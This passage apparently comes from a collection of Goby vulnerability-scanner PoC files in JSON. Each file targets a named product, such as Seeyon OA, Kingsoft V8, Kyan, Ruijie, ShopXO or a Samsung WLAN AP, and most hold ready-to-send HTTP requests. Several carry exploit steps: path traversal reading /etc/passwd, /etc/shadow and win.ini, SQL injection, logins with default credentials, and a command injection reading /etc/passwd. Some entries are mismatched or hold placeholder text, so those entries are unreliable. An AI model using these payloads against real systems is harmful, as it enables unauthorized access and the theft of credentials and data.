attacker will log in as an administrator
", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/C6/Jhsoft.Web.login/AjaxForLogin.aspx", 23 | "follow_redirect": false, 24 | "header": { 25 | "Content-Type": "application/x-www-form-urlencoded" 26 | }, 27 | "data_type": "text", 28 | "data": "type=login&loginCode=YWRtaW4=&&pwd=MDAwMDAw&" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "OK", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "系统管理员", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [] 58 | } 59 | ], 60 | "PostTime": "2021-04-04 22:43:50", 61 | "GobyVersion": "1.8.255" 62 | } -------------------------------------------------------------------------------- /json/Jinher_OA_C6_download.jsp_Arbitrary_file_read.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "金和OA C6 download.jsp 任意文件读取漏洞", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "app=\"Jinher-OA\"", 6 | "Description": "金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | 
"type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "xml", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-06-12 11:18:49", 50 | "GobyVersion": "1.8.268" 51 | } -------------------------------------------------------------------------------- /json/Jinshan_V8.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "金山 V8", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "title=\"在线安装-V8+终端安全系统Web控制台\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/htmltopdf/downfile.php?filename=downfile.php", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "filename", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-04-25 11:24:32", 50 | "GobyVersion": "1.8.239" 51 | } -------------------------------------------------------------------------------- /json/Jitong_EWEBS_arbitrary_file_read.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "极通EWEBS任意文件读取", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "body=\"极通软件\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": 
"gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "HasExp": true, 16 | "ExpParams": [ 17 | { 18 | "name": "file", 19 | "type": "input", 20 | "value": "../../../../../../../Windows/win.ini", 21 | "show": "" 22 | } 23 | ], 24 | "ScanSteps": [ 25 | "AND", 26 | { 27 | "Request": { 28 | "method": "POST", 29 | "uri": "/casmain.xgi", 30 | "follow_redirect": false, 31 | "header": { 32 | "Content-Type": "application/x-www-form-urlencoded" 33 | }, 34 | "data_type": "text", 35 | "data": "Language_S=../../../../../../../Windows/win.ini" 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "MAPI=", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "ExploitSteps": [ 54 | "AND", 55 | { 56 | "Request": { 57 | "method": "POST", 58 | "uri": "/casmain.xgi", 59 | "follow_redirect": false, 60 | "header": { 61 | "Content-Type": "application/x-www-form-urlencoded" 62 | }, 63 | "data_type": "text", 64 | "data": "Language_S={{{file}}}" 65 | }, 66 | "ResponseTest": { 67 | "type": "group", 68 | "operation": "AND", 69 | "checks": [ 70 | { 71 | "type": "item", 72 | "variable": "$body", 73 | "operation": "contains", 74 | "value": "MAPI=", 75 | "bz": "" 76 | } 77 | ] 78 | }, 79 | "SetVariable": [] 80 | } 81 | ], 82 | "PostTime": "2021-06-17 20:58:40", 83 | "GobyVersion": "1.8.268" 84 | } -------------------------------------------------------------------------------- /json/Jitong_EWEBS_phpinfo_leak.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "极通EWEBSphpinfo泄露", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "body=\"极通软件\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | 
"References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/testweb.php", 21 | "follow_redirect": false, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$body", 33 | "operation": "contains", 34 | "value": "PHP Version", 35 | "bz": "" 36 | } 37 | ] 38 | }, 39 | "SetVariable": [] 40 | } 41 | ], 42 | "PostTime": "2021-06-17 21:19:12", 43 | "GobyVersion": "1.8.268" 44 | } -------------------------------------------------------------------------------- /json/Kingsoft_V8_Arbitrary_file_read.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Kingsoft V8 Arbitrary file read", 3 | "Level": "1", 4 | "Tags": [], 5 | "GobyQuery": "app=\"kingsoft-V8+-Terminal-security-system\"", 6 | "Description": "There is an arbitrary file reading vulnerability in Jinshan V8 terminal security system, through which attackers can download arbitrary files from the server", 7 | "Product": "Kingsoft V8", 8 | "Homepage": "https://www.ejinshan.net/", 9 | "Author": "PeiQi", 10 | "Impact": "through which attackers can download arbitrary files from the server
the attacker can obtain full permissions on the host
undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/inter/ajax.php?cmd=get_user_login_cmd", 23 | "follow_redirect": true, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "userSession", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-12 11:16:16", 52 | "GobyVersion": "1.8.258" 53 | } -------------------------------------------------------------------------------- /json/Kyan.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Kyan", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "title=\"platform - Login\" && body=\"login_files\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/hosts", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "UserName", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": 
"2021-04-25 12:36:15", 50 | "GobyVersion": "1.8.239" 51 | } -------------------------------------------------------------------------------- /json/Kyan_Account_password_leak.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Kyan 网络监控设备 账号密码泄露", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "title=\"platform - Login\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/hosts", 21 | "follow_redirect": false, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "UserName=", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-06-17 22:08:48", 50 | "GobyVersion": "1.8.268" 51 | } -------------------------------------------------------------------------------- /json/Kyan_design_account_password_disclosure.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Kyan design account password disclosure", 3 | "Level": "1", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"Kyan-Design\"", 8 | "Description": "Kyan network monitoring device has an account password leakage vulnerability, through which the attacker can obtain the account password and background permissions", 9 | "Product": "Kyan-Design", 10 | "Homepage": "https://kyan.com/", 11 | "Author": "PeiQi", 12 | "Impact": "through which the attacker can obtain 
the account password and backend administrative permissions
undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "name": "Filename", 21 | "type": "select", 22 | "value": "/../../../../../../../../../../etc/passwd,/../conf/config.properties,/../../../../../../../../../../etc/shadow", 23 | "show": "" 24 | } 25 | ], 26 | "ScanSteps": [ 27 | "AND", 28 | { 29 | "Request": { 30 | "method": "GET", 31 | "uri": "/../conf/config.properties", 32 | "follow_redirect": true, 33 | "header": {}, 34 | "data_type": "text", 35 | "data": "" 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "server.ssl", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [] 58 | } 59 | ], 60 | "ExploitSteps": [ 61 | "AND", 62 | { 63 | "Request": { 64 | "method": "GET", 65 | "uri": "{{{Filename}}}", 66 | "follow_redirect": true, 67 | "header": {}, 68 | "data_type": "text", 69 | "data": "" 70 | }, 71 | "SetVariable": [ 72 | "output|lastbody" 73 | ] 74 | } 75 | ], 76 | "PostTime": "2021-01-22 18:20:52", 77 | "GobyVersion": "1.8.237" 78 | } -------------------------------------------------------------------------------- /json/Laravel .env 配置文件泄露 CVE-2017-16894.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Laravel .env 配置文件泄露 CVE-2017-16894", 3 | "Level": "1", 4 | "Tags": [ 5 | "信息泄露" 6 | ], 7 | "GobyQuery": "app=\"Laravel-Framework\"", 8 | "Description": "Laravel Framework是Taylor Otwell软件开发者开发的一款基于PHP的Web应用程序开发框架。 Laravel framework 5.5.21及之前的版本中存在 .env 文件可被下载的信息泄露漏洞。远程攻击者可利用该漏洞获取敏感信息", 9 | "Product": "Laravel framework <= 5.5.21", 10 | "Homepage": "https://github.com/laravel/framework/tree/5.5", 11 | "Author": "PeiQi", 12 | "Impact": "咩咩咩🐏
🐏
", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ScanSteps": [ 19 | "AND", 20 | { 21 | "Request": { 22 | "method": "GET", 23 | "uri": "/authenticationserverservlet/", 24 | "follow_redirect": true, 25 | "header": {}, 26 | "data_type": "text", 27 | "data": "" 28 | }, 29 | "ResponseTest": { 30 | "type": "group", 31 | "operation": "AND", 32 | "checks": [ 33 | { 34 | "type": "item", 35 | "variable": "$code", 36 | "operation": "==", 37 | "value": "200", 38 | "bz": "" 39 | }, 40 | { 41 | "type": "item", 42 | "variable": "$body", 43 | "operation": "contains", 44 | "value": "administrator", 45 | "bz": "" 46 | } 47 | ] 48 | }, 49 | "SetVariable": [] 50 | } 51 | ], 52 | "ExploitSteps": [ 53 | "AND", 54 | { 55 | "Request": { 56 | "method": "GET", 57 | "uri": "/authenticationserverservlet/", 58 | "follow_redirect": true, 59 | "header": {}, 60 | "data_type": "text", 61 | "data": "" 62 | }, 63 | "SetVariable": [ 64 | "output|lastbody" 65 | ] 66 | } 67 | ], 68 | "PostTime": "2021-03-22 14:21:12", 69 | "GobyVersion": "1.8.237" 70 | } -------------------------------------------------------------------------------- /json/RG_UAC.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "RG-UAC", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "title=\"RG-UAC登录页面\"", 6 | "Description": "锐捷RG-UAC 账户硬编码漏洞", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/get_dkey.php?user=admin", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": 
"==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "password", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-04-25 13:05:29", 50 | "GobyVersion": "1.8.239" 51 | } -------------------------------------------------------------------------------- /json/Ruijie_smartweb_weak_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Ruijie smartweb weak password", 3 | "Level": "1", 4 | "Tags": [ 5 | "弱口令" 6 | ], 7 | "GobyQuery": "app=\"Ruijie-WiFi\" && body=\"无线smartWeb--登录页面\"", 8 | "Description": "Ruijie smartweb management system opens the guest account vulnerability by default , and the attacker can log in to the background through the vulnerability to further attack (guest/guest)", 9 | "Product": "Ruijie smartweb", 10 | "Homepage": "http://www.ruijie.com.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "The attacker can log in to the background for further attack
undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/WEB_VMS/LEVEL15/", 23 | "follow_redirect": false, 24 | "header": { 25 | "Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q=" 26 | }, 27 | "data_type": "text", 28 | "data": "command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant." 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "Level was: LEVEL15", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-04-04 11:26:02", 54 | "GobyVersion": "1.8.255" 55 | } -------------------------------------------------------------------------------- /json/RuoYi_Druid_Unauthorized_access.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "RuoYi Druid Unauthorized access", 3 | "Level": "0", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"ruoyi-System\"", 8 | "Description": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information", 9 | "Product": "RuoYi", 10 | "Homepage": "https://gitee.com/y_project/RuoYi-Vue", 11 | "Author": "PeiQi", 12 | "Impact": " resulting in unauthorized access to sensitive information
undefined
", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "POST", 20 | "uri": "/Login/Index/doLogin", 21 | "follow_redirect": false, 22 | "header": { 23 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" 24 | }, 25 | "data_type": "text", 26 | "data": "username=admin&password=admin%40123" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$body", 35 | "operation": "contains", 36 | "value": "true", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "userid", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-06-23 18:32:59", 52 | "GobyVersion": "1.8.268" 53 | } -------------------------------------------------------------------------------- /json/Samsung_WLAN_AP_WEA453e_RCE.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Samsung WLAN AP WEA453e RCE", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "title==\"Samsung WLAN AP\"", 6 | "Description": "三星 WLAN AP WEA453e路由器 存在远程命令执行漏洞,可在未授权的情况下执行任意命令获取服务器权限", 7 | "Product": "三星 WLAN AP WEA453e路由器", 8 | "Homepage": "https://www.samsung.com/", 9 | "Author": "lxy@secbug.org", 10 | "Impact": "暂无
", 11 | "Recommandation": "暂无
", 12 | "References": [ 13 | "Internet" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "POST", 20 | "uri": "/(download)/tmp/a.txt", 21 | "follow_redirect": true, 22 | "header": { 23 | "Connection": "close", 24 | "Content-Length": "48" 25 | }, 26 | "data_type": "text", 27 | "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt" 28 | }, 29 | "ResponseTest": { 30 | "type": "group", 31 | "operation": "AND", 32 | "checks": [ 33 | { 34 | "type": "item", 35 | "variable": "$code", 36 | "operation": "==", 37 | "value": "200", 38 | "bz": "" 39 | }, 40 | { 41 | "type": "item", 42 | "variable": "$body", 43 | "operation": "contains", 44 | "value": "root", 45 | "bz": "" 46 | } 47 | ] 48 | }, 49 | "SetVariable": [] 50 | } 51 | ], 52 | "PostTime": "2021-04-01 11:47:39", 53 | "GobyVersion": "1.8.237" 54 | } -------------------------------------------------------------------------------- /json/Seeyon_OA_A6_DownExcelBeanServlet_User_information_leakage.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Seeyon OA A6 DownExcelBeanServlet User information leakage", 3 | "Level": "0", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"Yonyou-Seeyon-OA\" && body=\"致远协创A6\"", 8 | "Description": "There is an unauthorized interface in Zhiyuan OA A6, so that any visitor can download the user information in OA", 9 | "Product": "Seeyon OA A6", 10 | "Homepage": "https://www.seeyon.com/", 11 | "Author": "PeiQi", 12 | "Impact": "Download user information file
Usernames can be brute-forced, and user passwords allow logging in to the backend for further attack
undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/yyoa/assess/js/initDataAssess.jsp", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "personList", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "not contains", 50 | "value": "/yyoa/index.jsp", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [] 56 | } 57 | ], 58 | "PostTime": "2021-04-05 10:33:26", 59 | "GobyVersion": "1.8.255" 60 | } -------------------------------------------------------------------------------- /json/Seeyon_OA_A6_setextno.jsp_SQL_injection.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Seeyon OA A6 setextno.jsp SQL injection", 3 | "Level": "2", 4 | "Tags": [ 5 | "SQL Injection" 6 | ], 7 | "GobyQuery": "app=\"Yonyou-Seeyon-OA\" && body=\"致远协创A6\"", 8 | "Description": "Seeyon OA A6 setextno.jsp There is a SQL injection vulnerability, and the server can be controlled by injecting and writing webshell files", 9 | "Product": "Seeyon OA A6", 10 | "Homepage": "https://www.seeyon.com/", 11 | "Author": "PeiQi", 12 | "Impact": "Controlling the server by injecting and writing webshell files
undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=%2899999%29%20union%20all%20select%201,2,%28md5%281%29%29,4", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "c4ca4238a0b923820dcc509a6f75849b", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-05 13:58:27", 52 | "GobyVersion": "1.8.255" 53 | } -------------------------------------------------------------------------------- /json/Seeyon_OA_A6_test.jsp_SQL_injection.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Seeyon OA A6 test.jsp SQL injection", 3 | "Level": "2", 4 | "Tags": [ 5 | "SQL Injection" 6 | ], 7 | "GobyQuery": "app=\"Yonyou-Seeyon-OA\"", 8 | "Description": "Seeyon OA A6 test.jsp There is a SQL injection vulnerability, and the server can be controlled by injecting and writing webshell files", 9 | "Product": "Seeyon OA A6 ", 10 | "Homepage": "https://www.seeyon.com/", 11 | "Author": "PeiQi", 12 | "Impact": "Controlling the server by injecting and writing webshell files
Attackers can obtain sensitive information such as the website path and user names for further attack
undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/seeyon/management/index.jsp", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "Password", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-05 14:59:04", 52 | "GobyVersion": "1.8.255" 53 | } -------------------------------------------------------------------------------- /json/ShopXO_download_Arbitrary_file_read_CNVD_2021_15822.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ShopXO download 任意文件读取漏洞 CNVD-2021-15822", 3 | "Level": "2", 4 | "Tags": [], 5 | "GobyQuery": "(title='ShopXO')", 6 | "Description": "ShopXO是一套开源的企业级开源电子商务系统。\nShopXO存在文件上传漏洞,攻击者可利用该漏洞获取网站服务器控制权。", 7 | "Product": "ShopXO", 8 | "Homepage": "https://www.shopxo.net", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "undefined
", 12 | "References": [ 13 | "https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog" 14 | ], 15 | "HasExp": true, 16 | "ExpParams": [ 17 | { 18 | "name": "Cmd", 19 | "type": "input", 20 | "value": "L2V0Yy9wYXNzd2Q=", 21 | "show": "" 22 | } 23 | ], 24 | "ScanSteps": [ 25 | "AND", 26 | { 27 | "Request": { 28 | "method": "GET", 29 | "uri": "/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=", 30 | "follow_redirect": true, 31 | "header": {}, 32 | "data_type": "text", 33 | "data": "" 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "root", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "ExploitSteps": [ 52 | "AND", 53 | { 54 | "Request": { 55 | "method": "GET", 56 | "uri": "/public/index.php?s=/index/qrcode/download/url/{{{Cmd}}}", 57 | "follow_redirect": true, 58 | "header": {}, 59 | "data_type": "text", 60 | "data": "" 61 | }, 62 | "ResponseTest": { 63 | "type": "group", 64 | "operation": "AND", 65 | "checks": [ 66 | { 67 | "type": "item", 68 | "variable": "$body", 69 | "operation": "contains", 70 | "value": "root", 71 | "bz": "" 72 | } 73 | ] 74 | }, 75 | "SetVariable": [ 76 | "output|lastbody" 77 | ] 78 | } 79 | ], 80 | "PostTime": "2021-06-02 14:48:55", 81 | "GobyVersion": "1.8.268" 82 | } -------------------------------------------------------------------------------- /json/SonarQube_unauth_CVE_2020_27986.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SonarQube unauth CVE-2020-27986", 3 | "Level": "3", 4 | "Tags": [ 5 | "unauth" 6 | ], 7 | "GobyQuery": "app=\"SonarQube\"", 8 | "Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.", 9 | "Product": "SonarQube", 10 | "Homepage": "https://www.sonarqube.org/", 11 | "Author": 
"aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/api/settings/values", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "sonaranalyzer-cs.nuget.packageVersion", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "sonar.core.id", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "PostTime": "2021-11-29 15:03:58", 68 | "GobyVersion": "1.9.310" 69 | } -------------------------------------------------------------------------------- /json/SonicWall SSL-VPN 远程命令执行漏洞.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SonicWall 